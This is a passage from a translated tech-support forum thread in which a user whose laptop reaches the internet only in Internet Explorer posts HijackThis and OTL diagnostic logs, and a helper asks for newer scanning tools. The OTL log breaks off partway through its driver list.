szefcu45 posted 16 July 2011 (edited)

Hello. I'm writing because I have a strange problem: the Internet on my laptop works only in Internet Explorer. I checked in Mozilla, Opera and Chrome, and it doesn't work. I have already scanned the computer with FlashDisinfector, Trojan Remover and Avast, and cleaned it with ATF Cleaner. I removed all the infections those programs detected, but it didn't help. I have no idea what else can be done, so I'm posting a HijackThis log; I hope it helps and that you can help locate the source of the problem.

[log]
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:20:04, on 2011-07-15
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16982)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wuauclt.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = my.daemon-search.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.live.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O2 - BHO: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll
O2 - BHO: ThinkVantage Password Manager - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O3 - Toolbar: Show Norton Toolbar - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O3 - Toolbar: DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll
O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto
O4 - HKLM\..\Run: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui
O4 - HKLM\..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /boot
O8 - Extra context menu item: &Windows Live Search - res://c:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&ksport do programu Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra 'Tools' menuitem: ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Pure Networks Net2Go Service (nmraapache) - Pure Networks, Inc. - C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe
O23 - Service: Pure Networks Network Magic Service (nmservice) - Pure Networks, Inc. - C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe
O23 - Service: ThinkPad HDD APS Logging Service (TPHDEXLGSVC) - Lenovo. - C:\Windows\System32\TPHDEXLG.exe
O23 - Service: TVT Backup Protection Service - Unknown owner - C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
O23 - Service: TVT Backup Service - Lenovo Group Limited - C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe

--
End of file - 5594 bytes
[/log]

wirusolog commented 16 July 2011 (edited)

By today's standards HijackThis is an outdated program, of which only some functions can still be useful. A lot of malware evades HJT. There are other programs for checking whether there is malware on a computer. So please paste logs from [url=http://www.forumpc.pl/index.php?showtopic=104338][b][color=blue][u]OTL and RSIT[/u][/color][/b][/url] + [url=http://www.forumpc.pl/index.php?showtopic=116175][b][color=blue][u]GMER[/u][/color][/b][/url].

szefcu45 (Author) commented 18 July 2011 (edited)

I couldn't get a log from GMER, because the computer either shut down or threw a blue screen, but I have logs from OTL and RSIT. The laptop has one partition, C.

OTL:

[log]
OTL logfile created on: 2011-07-18 10:25:13 - Run 1
OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr
Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation
Internet Explorer (Version = 7.0.6000.16982)
Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd
1,99 Gb Total Physical Memory | 1,00 Gb Available Physical Memory | 50,02% Memory free
4,21 Gb Paging File | 3,12 Gb Available in Paging File | 74,07% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 142,25 Gb Total Space | 46,21 Gb Free Space | 32,48% Space Free | Partition Type: NTFS
Computer Name: Max-PC | User Name: Max | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: Off | File Age = 60 Days [color=#E56717]========== Processes (All) ==========[/color] PRC - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe PRC - [2011-07-04 13:43:54 | 003,493,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe PRC - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe PRC - [2011-04-04 15:24:56 | 002,923,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2011-04-04 15:22:57 | 000,007,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lsass.exe PRC - [2011-04-04 15:13:37 | 000,247,296 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wbem\WmiPrvSE.exe PRC - [2011-04-03 11:00:49 | 000,634,632 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Internet Explorer\iexplore.exe PRC - [2011-04-03 11:00:46 | 000,301,568 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Internet Explorer\ieuser.exe PRC - [2011-04-03 09:53:26 | 000,168,960 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmplayer.exe PRC - [2011-04-02 18:59:04 | 000,053,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wuauclt.exe PRC - [2008-11-10 22:09:11 | 002,605,568 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SLsvc.exe PRC - [2007-10-16 19:33:00 | 000,037,424 | ---- | M] (Lenovo.) -- C:\Windows\System32\TPHDEXLG.exe PRC - [2007-07-10 17:02:52 | 000,950,272 | ---- | M] (Lenovo Group Limited) -- C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe PRC - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe PRC - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) 
-- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe PRC - [2006-11-02 14:34:46 | 000,287,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SearchIndexer.exe PRC - [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\winlogon.exe PRC - [2006-11-02 11:45:57 | 000,095,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wininit.exe PRC - [2006-11-02 11:45:50 | 000,037,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wbem\unsecapp.exe PRC - [2006-11-02 11:45:48 | 000,166,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskeng.exe PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC 
- [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:46 | 000,124,928 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\spoolsv.exe PRC - [2006-11-02 11:45:45 | 000,062,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\smss.exe PRC - [2006-11-02 11:45:40 | 000,279,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\services.exe PRC - [2006-11-02 11:45:21 | 000,210,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lsm.exe PRC - [2006-11-02 11:45:04 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dwm.exe PRC - [2006-11-02 11:45:00 | 000,007,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\csrss.exe [color=#E56717]========== Modules (All) ==========[/color] MOD - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe MOD - [2011-07-04 13:43:51 | 000,199,792 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\snxhk.dll MOD - [2011-04-04 15:45:16 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\atl.dll MOD - [2011-04-04 15:44:10 | 000,297,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\gdi32.dll MOD - [2011-04-04 15:34:10 | 000,425,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\netapi32.dll MOD - [2011-04-04 15:28:32 | 011,315,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shell32.dll MOD - [2011-04-04 15:22:57 | 000,072,704 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\secur32.dll MOD - [2011-04-04 15:15:47 | 000,040,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\srclient.dll MOD - [2011-04-04 15:07:43 | 000,875,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\kernel32.dll MOD - [2011-04-04 10:47:15 | 
000,788,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\rpcrt4.dll MOD - [2011-04-03 11:03:18 | 000,024,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lpk.dll MOD - [2008-11-10 22:13:34 | 001,585,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\setupapi.dll MOD - [2008-11-10 22:13:34 | 000,558,080 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\oleaut32.dll MOD - [2008-11-10 22:04:00 | 000,633,856 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\user32.dll MOD - [2006-11-02 14:36:16 | 000,138,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\spp.dll MOD - [2006-11-02 11:47:26 | 001,162,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ntdll.dll MOD - [2006-11-02 11:46:16 | 000,126,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\xmllite.dll MOD - [2006-11-02 11:46:14 | 000,288,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\Wldap32.dll MOD - [2006-11-02 11:46:14 | 000,178,688 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ws2_32.dll MOD - [2006-11-02 11:46:13 | 001,064,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shdocvw.dll MOD - [2006-11-02 11:46:13 | 000,994,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\vssapi.dll MOD - [2006-11-02 11:46:13 | 000,502,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\usp10.dll MOD - [2006-11-02 11:46:13 | 000,339,968 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shlwapi.dll MOD - [2006-11-02 11:46:13 | 000,240,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\uxtheme.dll MOD - [2006-11-02 11:46:13 | 000,107,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\userenv.dll MOD - [2006-11-02 11:46:13 | 000,073,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\vsstrace.dll MOD - [2006-11-02 11:46:13 | 000,020,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\version.dll MOD - [2006-11-02 
11:46:12 | 001,314,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ole32.dll MOD - [2006-11-02 11:46:12 | 000,733,696 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\propsys.dll MOD - [2006-11-02 11:46:12 | 000,120,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ntmarta.dll MOD - [2006-11-02 11:46:12 | 000,088,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\olepro32.dll MOD - [2006-11-02 11:46:12 | 000,056,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\samlib.dll MOD - [2006-11-02 11:46:12 | 000,012,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\psapi.dll MOD - [2006-11-02 11:46:12 | 000,010,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\nsi.dll MOD - [2006-11-02 11:46:10 | 000,681,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msvcrt.dll MOD - [2006-11-02 11:46:06 | 000,805,888 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msctf.dll MOD - [2006-11-02 11:46:05 | 000,115,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\imm32.dll MOD - [2006-11-02 11:46:05 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mpr.dll MOD - [2006-11-02 11:46:03 | 000,454,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\comdlg32.dll MOD - [2006-11-02 11:46:02 | 000,770,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\advapi32.dll MOD - [2006-11-02 11:46:02 | 000,523,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\clbcatq.dll MOD - [2006-11-02 11:46:02 | 000,171,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\apphelp.dll MOD - [2006-11-02 11:46:02 | 000,078,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\authz.dll MOD - [2006-11-02 11:44:49 | 000,110,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msscript.ocx MOD - [2006-11-02 11:44:42 | 000,255,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\winspool.drv MOD - 
[2006-11-02 11:38:57 | 001,648,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.6000.16386_none_5d07289e07e1d100\comctl32.dll [color=#E56717]========== Win32 Services (SafeList) ==========[/color] SRV - File not found [Disabled | Stopped] -- -- (Harmonogram automatycznej usługi LiveUpdate) SRV - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus) SRV - [2010-01-15 14:49:20 | 000,227,232 | ---- | M] (McAfee, Inc.) [Disabled | Stopped] -- C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe -- (McComponentHostService) SRV - [2008-11-10 22:07:42 | 000,265,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008-11-10 14:37:17 | 001,174,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe -- (Symantec Core LC) SRV - [2008-01-29 17:38:32 | 000,583,048 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service) SRV - [2007-09-26 16:23:26 | 002,999,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_2.EXE -- (LiveUpdate) SRV - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () [Auto | Running] -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe -- (TVT Backup Protection Service) SRV - [2007-07-10 16:37:38 | 000,644,408 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe -- (ThinkVantage Registry Monitor Service) SRV - [2007-07-10 15:40:14 | 000,045,056 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe -- (tvtnetwk) SRV - [2007-07-05 
16:48:54 | 000,206,120 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe -- (AcSvc) SRV - [2007-07-05 16:48:50 | 000,091,432 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe -- (AcPrfMgrSvc) SRV - [2007-06-07 17:43:46 | 000,013,312 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- c:\Program Files\Lenovo\System Update\SUService.exe -- (SUService) SRV - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) [Auto | Running] -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe -- (nmservice) SRV - [2007-03-14 16:42:22 | 000,012,800 | ---- | M] (Pure Networks, Inc.) [On_Demand | Stopped] -- C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe -- (nmraapache) SRV - [2007-03-02 07:07:28 | 000,055,936 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe -- (TPHKSVC) SRV - [2007-01-30 05:05:02 | 000,108,080 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Windows\System32\IPSSVC.EXE -- (IPSSVC) SRV - [2007-01-14 01:11:06 | 000,080,504 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Norton Internet Security\isPwdSvc.exe -- (ISPwdSvc) SRV - [2007-01-12 21:40:58 | 000,049,248 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe -- (comHost) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (LiveUpdate Notice Ex) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (CLTNetCnService) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccSetMgr) SRV - 
[2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccEvtMgr) SRV - [2007-01-05 02:19:28 | 000,047,712 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe -- (SymAppCore) SRV - [2006-11-15 17:20:46 | 000,634,988 | ---- | M] (Diskeeper Corporation) [Disabled | Stopped] -- C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe -- (Diskeeper) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx) DRV - [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswSP.sys -- (aswSP) DRV - [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi) DRV - [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr.sys -- (aswRdr) DRV - [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt) DRV - [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk) DRV - [2008-11-10 14:39:02 | 000,115,000 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SYMEVENT.SYS -- (SymEvent) DRV - [2008-05-02 10:58:14 | 000,008,064 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\usbser_lowerflt.sys -- (upperdev) DRV - [2008-05-02 10:58:12 | 000,017,536 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- 
C:\Windows\System32\drivers\ccdcmb.sys -- (nmwcd) DRV - [2007-12-06 19:11:00 | 000,012,080 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\TPPWR32V.SYS -- (TPPWRIF) DRV - [2007-10-16 19:33:00 | 000,103,472 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\Apsx86.sys -- (Shockprf) DRV - [2007-10-16 19:32:00 | 000,019,504 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\ApsHM86.sys -- (TPDIGIMN) DRV - [2007-05-22 16:59:38 | 000,030,336 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tvti2c.sys -- (TVTI2C) DRV - [2007-05-22 09:59:34 | 000,021,376 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\psadd.sys -- (psadd) DRV - [2007-04-29 23:45:18 | 002,219,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw4v32.sys -- (NETw4v32) Sterownik karty Intel(R) DRV - [2007-04-27 08:29:54 | 000,215,040 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CHDARTN.sys -- (HdAudAddService) DRV - [2007-04-10 03:59:00 | 000,008,704 | ---- | M] (Conexant Systems, Inc.) 
[Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2007-01-11 20:22:20 | 000,276,792 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtspl.sys -- (SRTSPL) DRV - [2007-01-11 20:22:18 | 000,025,400 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\drivers\srtspx.sys -- (SRTSPX) DRV - [2007-01-11 20:22:14 | 000,247,608 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtsp.sys -- (SRTSP) DRV - [2007-01-10 03:00:00 | 000,833,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVEX15.SYS -- (NAVEX15) DRV - [2007-01-10 03:00:00 | 000,387,384 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl) DRV - [2007-01-10 03:00:00 | 000,102,712 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv) DRV - [2007-01-10 03:00:00 | 000,080,408 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVENG.SYS -- (NAVENG) DRV - [2007-01-09 16:32:14 | 000,191,544 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\Drivers\SYMTDI.SYS -- (SYMTDI) DRV - [2007-01-09 16:32:14 | 000,145,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMFW.SYS -- (SYMFW) DRV - [2007-01-09 16:32:14 | 000,040,120 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMIDS.SYS -- (SYMIDS) DRV - [2007-01-09 16:32:14 | 000,038,200 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMNDISV.SYS -- (SYMNDISV) DRV - 
